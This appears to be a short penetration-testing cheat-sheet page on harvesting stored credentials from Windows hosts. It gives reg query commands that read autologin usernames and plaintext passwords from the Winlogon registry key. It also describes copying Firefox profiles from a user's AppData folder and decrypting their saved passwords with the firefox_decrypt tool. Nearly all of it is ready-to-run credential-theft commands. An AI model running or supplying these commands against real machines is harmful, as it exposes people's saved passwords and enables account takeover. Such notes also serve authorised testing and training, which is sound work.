# Stored Creds

### Autologin Creds

```powershell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
```

### Firefox creds dump

For that, we need a valid `profile`. The `profile` is stored in `APPDATA.`\
The absolute path to profiles is this => `C:\Users\<USERNAME>\AppData\Roaming\Mozilla\Firefox\Profiles.`\
From this we can get the profile, we simply download all the profiles. \
Now that we have all profiles we use [firefox\_decrypt](https://github.com/unode/firefox_decrypt).&#x20;

```
python3 /opt/firefox_decrypt/firefox_decrypt.py <PROFILE> 
```